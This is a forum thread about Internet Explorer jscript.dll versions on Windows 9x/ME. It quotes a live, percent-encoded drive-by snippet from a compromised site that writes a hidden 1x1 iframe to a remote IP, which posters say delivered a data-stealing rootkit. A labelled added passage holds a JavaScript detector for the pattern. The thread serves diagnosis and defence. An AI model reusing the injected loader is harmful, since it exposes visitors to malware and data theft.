
Jscript.dll 5.6.0.8833 problems


eidenk


OK so I had jscript.dll 5.6.0.8831 and this script dropped a vm3.exe from 81.95.146.98 in my temp folder which fortunately crashed immediately :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0026)http://www.alchemylab.com/ -->
<script language=javascript> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </SCRIPT>

I did update to jscript.dll 5.6.0.8833 which fixed the above problem but unfortunately it breaks stuff, namely I can't post correctly in boards anymore with it.

On some boards, the edit field does not display at all anymore and here it displays the edit field but none of the formatting stuff at all.

This happens with IE 5.5SP2 KB905915 on WinME.

Any ideas ? Am I missing something in addition to jscript.dll 5.6.0.8833 so that I can post correctly in boards with it ?

Does the problem exist with IE6 as well ?

Edited by eidenk
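
A static check for the pattern in the post above, as an added example that is not part of the original thread: it finds document.write(unescape('...')) calls in saved HTML, decodes the argument, and reports any 1x1 iframe pointing at an external host, which is the form the encoded string in the post takes. It also handles %uXXXX escapes, which goes slightly beyond the posted snippet. The function names are hypothetical, and the sample pages and the host 192.0.2.10 (a documentation address) are constructed.

```javascript
// Added example (not from the thread). Names and sample data are constructed.
// Decode %XX and %uXXXX sequences the way the legacy unescape() does.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Read one attribute from a tag; the value may be quoted or bare.
function attr(tag, name) {
  const re = new RegExp(
    '\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Return every near-invisible iframe written via document.write(unescape(...)).
function findHiddenFrames(html) {
  const findings = [];
  const call =
    /document\.write\s*\(\s*unescape\s*\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/gi;
  for (const m of html.matchAll(call)) {
    const decoded = decodeEscapes(m[2]);
    for (const t of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const tag = t[0];
      const src = attr(tag, 'src') || '';
      const width = parseInt(attr(tag, 'width'), 10);   // NaN when absent
      const height = parseInt(attr(tag, 'height'), 10);
      const host = (/^https?:\/\/([^\/:?#]+)/i.exec(src) || [])[1] || null;
      // Flag only frames a visitor cannot see that load from a remote host.
      if (host && width <= 1 && height <= 1) {
        findings.push({ host, src, width, height });
      }
    }
  }
  return findings;
}

// Constructed sample pages: one injected, one with an ordinary visible frame.
const SAMPLE_INJECTED = "<html><script>document.write( unescape( " +
  "'%3Ciframe src=http://192.0.2.10/ width=%31 height=%31%3E%3C/iframe%3E'" +
  " ) );</script></html>";
const SAMPLE_VISIBLE = '<script>document.write(unescape(' +
  '"%3Ciframe src=\'http://example.com/\' width=\'600\' height=\'400\'%3E"' +
  '))</script>';

console.log(findHiddenFrames(SAMPLE_INJECTED), findHiddenFrames(SAMPLE_VISIBLE));
```

Run over a saved copy of a page, an empty result means no frame matched this one pattern; it does not mean the page is clean.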


Actually, eidenk, version 5.6.0.8833 of JSCRIPT.DLL has MAJOR flaws.

It caused a WinXP crash mentioned here:

http://www.d-a-l.com/help/showthread.php?t=43986

Also, version 5.6.0.8833 of JSCRIPT.DLL is incompatible with Win9x/ME/NT4 OSes. the_guy will remove this version of jscript.dll from the WinME service pack in the upcoming beta.

My quote from the ME SP page about jscript.dll v5.6.0.8833-

HOWEVER, I have tested version 5.6.0.8833 of JSCRIPT.DLL and VBSCRIPT.DLL files and they do NOT register under Win98/ME. MDGx is RIGHT about THAT. If these files were from a beta version of Windows Vista then they should NOT be included in future betas of the ME service pack and in unofficial U917344 fix.

Try using version 5.6.0.8832 of JSCRIPT.DLL file, which is mentioned in MS article 919237. Build 8832 does work fine under Win9x/ME/NT4.

Edited by erpdude8

Thanks dude, I hadn't followed up the latest developments of the service packs lately, but as I saw that this file was now included in most of them I tried it.

I have just read kb919237 about JSCRIPT.DLL 5.6.0.8832. Unfortunately it does not seem to address any security issue over 5.6.0.8831, only a slow performance issue on some page with IE6, and the above script is able to download a file from a website and execute it on my machine with 5.6.0.8831.

In the last six months or so I caught Gromozon/Link Optimizer, Bagle, Haxdoor, lsasss, PurityScan, CnsMin and now this one. All through IE and possibly all through the same flaw in jscript.dll.

Has someone got JSCRIPT.DLL 5.6.0.8832 so that I could try it even though I am pretty sure it won't fix the hole. It should be in MESP Beta6 but I don't have it and the download link is dead.


I have just read kb919237 about JSCRIPT.DLL 5.6.0.8832. Unfortunately it does not seem to address any security issue over 5.6.0.8831, only a slow performance issue on some page with IE6, and the above script is able to download a file from a website and execute it on my machine with 5.6.0.8831.

In the last six months or so I caught Gromozon/Link Optimizer, Bagle, Haxdoor, lsasss, PurityScan, CnsMin and now this one. All through IE and possibly all through the same flaw in jscript.dll.

Has someone got JSCRIPT.DLL 5.6.0.8832 so that I could try it even though I am pretty sure it won't fix the hole. It should be in MESP Beta6 but I don't have it and the download link is dead.

I have also tested the Alchemylab.com web site on my WinXP SP2 + IE7 system which had JSCRIPT.DLL version 5.7.0.5730. The site works and does not crash but I get Internet Explorer script error message "Unexpected error (0x80070005)". Click on the yellow exclamation mark (!) on the bottom-left hand corner of IE and the script error message will be displayed.

You could try using jscript.dll version 5.7.0.5730 which does register and work under IE6 + Win98/ME. The vm3.exe file won't crash IE but you'll get scripting errors with the Alchemylab.com site.

eidenk, I think it's more likely the web page coding is faulty. Contact the webmaster of the www.alchemylab.com site and have him fix the code on his site.

Edited by erpdude8

Thanks erpdude but let's try to clarify :

I have also tested the Alchemylab.com web site on my WinXP SP2 + IE7 system which had JSCRIPT.DLL version 5.7.0.5730. The site works and does not crash but I get Internet Explorer script error message "Unexpected error (0x80070005)". Click on the yellow exclamation mark (!) on the bottom-left hand corner of IE and the script error message will be displayed.

IE does not crash here but a file called vm3.exe is downloaded from a website in Russia and then executed on my machine simply by accessing the Alchemylab.com web site or just by running a local html page in which the above snippet of javascript is included.

Copying/pasting this snippet into notepad, saving as html and then opening it with IE does the same job. Vm3.exe gets downloaded and executed but as it is not compatible with 9x OSes, it crashes itself immediately (IE is not affected) instead of hiding itself and sending personal data somewhere on the web as it is supposed to do on an NT OS. According to peeps on the sysinternals forum on which I also posted that stuff, vm3.exe is a data stealer rootkit, meaning that as soon as it is downloaded and executed on an NT OS, it hides itself from both the file manager and the process manager and attempts to steal personal data from you.

Vm3.exe is actually quite irrelevant to my post. What I am interested in is the javascript exploit that allows this file to be downloaded and executed on my machine without any other interaction than running a web page on which there is this piece of script.

Obviously this script in a modified form would be able to download and execute anything on my machine and possibly screw my system totally by a plethora of possible means. Code exists to erase BIOSes from within windows, damage hardware or totally screw the file system. Any such scenario and others are possible through this javascript exploit.

You could try using jscript.dll version 5.7.0.5730 which does register and work under IE6 + Win98/ME. The vm3.exe file won't crash IE but you'll get scripting errors with the Alchemylab.com site.

It is not clear in your post whether this vm3.exe gets downloaded and executed or not on your XP machine with jscript.dll 5.7.0.5730. Bear in mind that, as it is a rootkit, you will not notice it is there (if it is there) through normal means.

It is not clear either whether you actually tried Win98/ME + IE6 + jscript.dll 5.7.0.5730 on that page or just infer what you say from your test with XPSP2 + IE7.

eidenk, I think it's more likely the web page coding is faulty. Contact the webmaster of the www.alchemylab.com site and have him fix the code on his site.

No it's not faulty, it is infected with an exploit that at least affects 9x OSes + IE5.5 + JSCRIPT.DLL 5.6.0.8831 and very possibly NT systems also as vm3.exe seems to be targeted exclusively at those systems.

Please could someone post this jscript.dll 5.7.0.5730 so that it can be tried here.


I bump it because that javascript exploit is very serious stuff IMO and most certainly affects all fully patched 9x systems.

Can someone confirm that a 98SE or ME system with a fully patched IE 6 (SP1 + Maximum Decim Update) is vulnerable to that exploit ?


Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?


Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730


Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

So it means that all our 9x systems are vulnerable to that nasty javascript exploit, no matter how well updated they are.


Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

So it means that all our 9x systems are vulnerable to that nasty javascript exploit, no matter how well updated they are.

NOT really, or only if you make a rod for your own back. I mean WHY use IE6? Just use Firefox. If you have to use IE5/6 then do so only on a trusted site.


Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

So it means that all our 9x systems are vulnerable to that nasty javascript exploit, no matter how well updated they are.

NOT really, or only if you make a rod for your own back. I mean WHY use IE6? Just use Firefox. If you have to use IE5/6 then do so only on a trusted site.

That's not really an answer to the problem.

Besides, there is no trusted site as any site could be hacked and pages infected with a script like that.

And a rogue chm file from a download or another could also be infected. I have just built one with only that script in it and it is vulnerable.

Edited by eidenk

If it helps, I can send a copy of jscript.dll from Vista RC2 to see if it fixes the problem.

the_guy

As this vm3.exe is meant to attack NT systems (it crashes on 9x OSes), I believe this javascript vulnerability exists on all MS OSes and versions of IE otherwise it does not make sense to set a trap like that.

Anyway I'll PM you my email so you can send me this Vista jscript.dll for a try.

Edit : Thanks the_guy. Still vulnerable with this build 5.7.0.5744 from Vista RC2.

I bet this exploit also screws the supersecure Vista machines then.

How can we make Microsoft aware so that they fix it ? They have to fix it if it affects also XP and Vista.

Edited by eidenk

If it helps, I can send a copy of jscript.dll from Vista RC2 to see if it fixes the problem.

the_guy

eidenk and the_guy, I think the jscript.dll file from final release of Windows Vista is also vulnerable

